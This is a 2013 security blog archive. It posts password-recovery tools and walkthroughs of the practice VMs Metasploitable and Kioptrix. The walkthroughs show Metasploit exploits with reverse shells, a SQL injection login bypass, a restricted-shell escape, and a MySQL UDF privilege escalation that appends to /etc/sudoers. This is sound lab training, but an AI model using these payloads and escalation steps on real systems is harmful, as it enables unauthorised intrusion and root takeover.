Wednesday, November 27, 2013

Tool - PickAx Password Finder

A PAX file is an encrypted image format, where Blowfish is used as the encryption algorithm. The tool, called Pick Ax, was developed by Smaller Animals, but it's not accessible anymore from the original website (http://www.smalleranimals.com/pickaxe.htm), but you can find it here:

The image header signature is: "PAX" (0x50 0x41 0x58) in the first 3 bytes.

I made a script, which can simply try passwords from a wordlist (or you can specify a single one) against a given image. It requires _ISource50.dll, which contains a function to check for the password, it's downloadable from Smaller Animal's website:
http://www.smalleranimals.com/zips/ImgSource5/isource50.zip

Using the tool is really simple:

Usage: pickaxpwfinder.py [options]

Options:
  -h, --help            show this help message and exit
  -p PASSWORD, --password=PASSWORD
                        Password to try
  -d DICTIONARY, --dictionary=DICTIONARY
                        Specify dictionary (wordlist)
  -f FILE, --file=FILE  Chose PAX file to crack

I also made an encrypted PAX image to play with, the password is "password".

It can be downloaded from my site:
https://sites.google.com/site/csabyblog/home/pickaxpwfinder

Monday, November 25, 2013

Tool: Total Commander FTP Password Recovery

I made a simple Python script, which can recover Total Commander stored FTP passwords.

The usage of the tool is very simple:

Usage: tcpwrecovery.py [options]

Options:
  -h, --help            show this help message and exit
  -c, --common          Search wcx_ftp.ini in common places
  -f FILE, --file=FILE  File to decrypt
  -p PASSWORD, --password=PASSWORD
                        Password to decrypt

It can search in some common places for the INI file, you can explicitly specify the location or you can simply supply the encrypted password. Sample output:

c:\tcpwrecovery>tcpwrecovery.py -c
-> Trying: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini
-> Found: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini
-> Decrypting: C:\Users\user1\AppData\Roaming\GHISLER\wcx_ftp.ini

[connections]
1=example.com
default=example.com
[example.com]
host=example.com
username=fakeusername
password=fakepassword
pasvmode=0
MLSD=-1
[default]
pasvmode=0

-> Trying: C:\Windows\wcx_ftp.ini
-> Not found: C:\Windows\wcx_ftp.ini

-> Trying: wcx_ftp.ini
-> Not found: wcx_ftp.ini

License: MIT

Downloadable from my site: https://sites.google.com/site/csabyblog/home/tcpwrecovery

Monday, November 11, 2013

Metasploitable 2 - Walkthrough

There is a second, newer release to Metasploitable (2), which is downloadble from here:

http://sourceforge.net/projects/metasploitable/

It has most of the services from the old edition and quite a bunch of new ones.

Here is the NMAP scan:

root@kali:~# nmap -sS -A 192.168.1.23 -p1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-10 08:21 CET
Nmap scan report for 192.168.1.23
Host is up (0.00051s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-10T07:23:51+00:00; -2s from local time.
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37592/tcp  mountd
|   100005  1,2,3      38749/udp  mountd
|   100021  1,3,4      48184/udp  nlockmgr
|   100021  1,3,4      49513/tcp  nlockmgr
|   100024  1          41287/tcp  status
|_  100024  1          48160/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: )%{aRYF2h4j:$B`>RcyY
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    Unknown security type (33554432)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Throttled: Reconnecting too fast) -Email admin@Metasploitable.LAN for more information.
6697/tcp  open  irc         Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Too many unknown connections from your IP)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34829/tcp open  unknown
37592/tcp open  mountd      1-3 (RPC #100005)
41287/tcp open  status      1 (RPC #100024)
49513/tcp open  nlockmgr    1-4 (RPC #100021)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37592/tcp  mountd
|   100005  1,2,3      38749/udp  mountd
|   100021  1,3,4      48184/udp  nlockmgr
|   100021  1,3,4      49513/tcp  nlockmgr
|   100024  1          41287/tcp  status
|_  100024  1          48160/udp  status
MAC Address: 00:0C:29:A1:61:F8 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-10T02:23:49-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.1.23

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.43 seconds

Again, as there are way too many options here, and doing it with MSF is easy, I will show two methods, and will the rest to you.

Method 1 - via FTP

After some search we can find that there is an MSF exploit for the VSFTP service installed:

https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

Running it we get root shell immediately, cause most likely the service is running with root privileges.

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.23     yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
id
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.17:34683 -> 192.168.1.23:6200) at 2013-11-11 21:24:13 +0100

uid=0(root) gid=0(root)
ls /root
Desktop
reset_logs.sh
vnc.log


Method 2 - distcc + nmap

This time I picked up the following exploit (again, Google search on the service):

https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.23     yes       The target address
   RPORT  3632             yes       The target port


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(distcc_exec) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 2 opened (192.168.1.17:4444 -> 192.168.1.23:60752) at 2013-11-11 21:27:52 +0100


id
uid=1(daemon) gid=1(daemon) groups=1(daemon)


You can place the session to background with CTRL + Z. As for privilege escalation I choose this, and it worked:

http://www.rapid7.com/db/modules/exploit/unix/local/setuid_nmap

msf exploit(setuid_nmap) > show options

Module options (exploit/unix/local/setuid_nmap):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   ExtraArgs                     no        Extra arguments to pass to Nmap (e.g. --datadir)
   Nmap         /usr/bin/nmap    yes       Path to setuid nmap executable
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files


Exploit target:

   Id  Name
   --  ----
   0   Command payload


msf exploit(setuid_nmap) > set SESSION 3
SESSION => 3
msf exploit(setuid_nmap) > exploit

[*] Dropping lua /tmp/ckhDpdXy.nse
[*] Started reverse double handler
id
[*] running
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qDkuWOTbsfd2gBW5;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nqDkuWOTbsfd2gBW5\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.23:43019) at 2013-11-11 21:34:51 +0100

uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
ls /root
Desktop
reset_logs.sh
vnc.log


That's all folks!

Saturday, November 9, 2013

Metasploitable - Walkthrough

Metasploitable is another vulnerable VM designed to practice penetration testing, and especially Metasploit. I could use manual methods like in the previous cases, but I decided to use Metasploit for the exploitation.

I started with NMAP as usual:

root@kali:~# nmap -sS -A 192.168.1.22

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 21:28 CET
Nmap scan report for 192.168.1.22
Host is up (0.0022s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-09T15:28:17-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   2.16 ms 192.168.1.22

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

As everything is too easy with Metasploit I will show two methods.


Method 1 - Samba

If we do a Google search for Samba 3.0.20 exploit, we run into the following webpage:

http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

which is exactly the MSF module we need. Configuring and running MSF:

msf exploit(usermap_script) > set RHOST 192.168.1.22
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 192.168.1.17
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.22     yes       The target address
   RPORT  139              yes       The target port


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 1 opened (192.168.1.17:4444 -> 192.168.1.22:59321) at 2013-11-09 21:46:52 +0100

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/# 

As Samba was running with root privileges we are done...


Method 2 - via Tomcat Manager + UDEV Netlink local exploit

There is a Tomcat service at port 8180, and if we navigate to it we can find the default links, to the manager, admin page and so on. If we do a quick Google search we can find that the default Tomcat manager username and password are tomcat/tomcat. I tried and it really worked. Now we only need the exploit:

http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy

Here is the related MSF configration:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.22     yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.17:4444 -> 192.168.1.22:42541) at 2013-11-09 22:06:25 +0100

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55


As we can see we are not root yet, but a limited tomcat55 account. Let's put meterpreter to the background ('background' command) and look for a local root exploit.

I picked up the following:
http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart     use exploit/linux/local/sock_sendpage   use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec  use exploit/linux/local/udev_netlink   
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink

msf exploit(udev_netlink) > set SESSION 3
SESSION => 3
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1.  Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.22:48408) at 2013-11-09 22:14:30 +0100

id
uid=0(root) gid=0(root)


...and we are root.

There are more methods, but I will leave them to you.

Tool - TrueCrypt Search and Decrypt (tcsandd)

I developed this python script / tool for the 2013 DC3 Forensic Challenge. It will search for TC encrypted files in a folder or drive, and then will try to decrypt them.

I used some of the source codes from the following resources:


The codes above were rewritten to support TrueCrypt version 7, keyfile support was added.

The tool is very fast in searching TC volumes. The search logic is the following:
a. The suspect file size modulo 512 must equal zero.
b. The suspect file size is at least 256kB in size (this is the size of the headers + backup headers)
c. The suspect file must not contain a common file header.
d. The suspect file has entropy more then 7.6.
The search is actually looking for encrypted files, as it’s impossible to tell if a file is a TC volume until the correct password is supplied. Thus it can be used to look for other encrypted files like FreeOTFE.
Based on these rules, the search will find any possible encrypted file, not only TC. Proving that a file is actually a TC volume is impossible without decryption. If running it on the entire file system, it will find about 300 files, which are not real TC volumes at all, which is a very good false positive rate, considering that there are more than 200.000 files on a normal computer. (This is only if we have the provided foremost configuration file set, to filter out known headers). An example Foremost header configuration file provided with the source code.

The password tries are very slow compared to other tools like OTFBrutus (http://www.tateu.net/software/dl.php?f=OTFBrutusGUI), and the reason is that the hash and encryptions implemented in python are not so optimal. If we have only a couple of passwords to try, then the tool is good, but if not it will run for long time. The tool can decrypt an entire TC volume (hidden as well) once the password is found.

Available at my site: https://sites.google.com/site/csabyblog/

Tool - extractmd5

I made a small script a while back, which will extract MD5 strings from a given file, and print them out.

It's downloadable from my new site: https://sites.google.com/site/csabyblog/

Friday, November 8, 2013

Kioptrix Level 4 - Walkthrough

OK, so I got to the final level. As always I started with a port scan:

root@kali:~/kioptrix-level4# nmap -sS -A 192.168.1.21

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-07 06:34 CET
Nmap scan report for 192.168.1.21
Host is up (0.00039s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D5:AC:F6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2013-11-07T01:34:57-05:00
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.1.21

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds

As the host had SMB service, I run another NMAP script to enumerate users:

root@kali:~/kioptrix-level4# nmap -sS -A --script smb-enum-users 192.168.1.21 -p445

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-07 07:04 CET
Nmap scan report for 192.168.1.21
Host is up (0.00035s latency).
PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D5:AC:F6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

Host script results:
| smb-enum-users:
|   KIOPTRIX4\john (RID: 3002)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\loneferret (RID: 3000)
|     Full name:   loneferret,,,
|     Flags:       Normal user account
|   KIOPTRIX4\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Normal user account
|   KIOPTRIX4\robert (RID: 3004)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\root (RID: 1000)
|     Full name:   root
|_    Flags:       Normal user account

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.1.21

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.42 seconds

I saved the information (was useful at the next step), and went to the webpage. I really liked the nice little goat picture :)


This time I tried to login as one of the users, so for the user I entered john, and for password:
' OR 1=1 #

and I got to a webpage showing a password.


With this I could get the following passwords:

Username : robert   Password : ADGAdsafdfwt4gadfga==
Username : john   Password : MyNameIsJohn

loneferret and root gave an error, so those are not exists in the web app, or there is something else with them (later it turned out they do not exists). I used these password to SSH into the system, and I could get in with both of them.

Unfortunately I got only a limited shell, with allowing to execute only a couple of commands. Fortunately we can escape from it with a simple trick: execute "echo os.system('/bin/bash')".

root@kali:~# ssh -l john 192.168.1.21
john@192.168.1.21's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ netstat -antp
*** unknown command: netstat
john:~$ ps -aux
*** unknown command: ps
john:~$ ls
john:~$ pwd
*** unknown command: pwd
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ 
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ 


ps aux showed that the mysql process is running with root privileges:

root      4055  1.7  5.0 128132 26152 ?        Sl   01:22   1:53 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var

I really wanted to get in, so I went to the web app, and looked for the mysql password, which was actually empty.

john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name


john@Kioptrix4:/var/www$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 133426
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

There is a nice privilege escalation method with this version (and earlier) of the DB, is basically creating a user defined function, which will run with root privileges. The function will execute system commands for us.

More info here:

Instead of the exploit we can also use this one:

I downloaded the so file, but had some trouble sending it over, cause I couldn't connect back to my machine with HTTP, TFTP, or FTP. I finally found that SSH is working, so I used SCP to transfer it over. It worked only with executing it from the victim, the other way SCP was blocked.

robert@Kioptrix4:~$ scp root@192.168.1.17:~/kioptrix-level4/lib_mysqludf_sys.so ~/
The authenticity of host '192.168.1.17 (192.168.1.17)' can't be established.
RSA key fingerprint is 53:bd:7e:52:65:39:a3:84:70:31:66:10:73:f5:d6:b6.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.17' (RSA) to the list of known hosts.
root@192.168.1.17's password:
lib_mysqludf_sys.so                                                                                                100%   13KB  12.6KB/s   00:00   
robert@Kioptrix4:~$ ls
lib_mysqludf_sys.so
robert@Kioptrix4:~$

It turned out that this file already exists and loaded, and I shouldn't make this extra work.

mysql> select * from foo2 into dumpfile '/usr/lib/lib_mysqludf_sys.so';
ERROR 1086 (HY000): File '/usr/lib/lib_mysqludf_sys.so' already exists

I had some issues with the function execution, so recreated them:

mysql> DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
Query OK, 0 rows affected (0.00 sec)

mysql> DROP FUNCTION IF EXISTS sys_get;
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql> DROP FUNCTION IF EXISTS sys_set;
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql> DROP FUNCTION IF EXISTS sys_exec;
Query OK, 0 rows affected (0.00 sec)

mysql> DROP FUNCTION IF EXISTS sys_eval;
Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql>
mysql> CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| sys_get               |   0 | lib_mysqludf_sys.so | function |
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function |
| sys_set               |   2 | lib_mysqludf_sys.so | function |
| sys_exec              |   2 | lib_mysqludf_sys.so | function |
| sys_eval              |   0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
5 rows in set (0.00 sec)

I tried to open a reverse shell, but it didn't work out, so finally I just updated the sudoers file with adding robert, and that worked. I also copied the shadow file and sudoers files to my home directory which I don't show here.

mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select sys_exec("echo 'robert ALL=(ALL) ALL'>> /etc/sudoers");
+--------------------------------------------------------+
| sys_exec("echo 'robert ALL=(ALL) ALL'>> /etc/sudoers") |
+--------------------------------------------------------+
|                                                      0 |
+--------------------------------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
robert@Kioptrix4:~$ sudo bash
[sudo] password for robert:
root@Kioptrix4:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:~# ls /root/
congrats.txt  lshell-0.9.12
root@Kioptrix4:~# cat /root/congrats.txt
Congratulations!
You've got root.
(...)



#Other ways:

I also found that you can run sqlmap against the webapp to make SQL injection, but that wasn't my way doing it.

-----

I really enjoyed going through all levels, thanks to the developers of these VMs.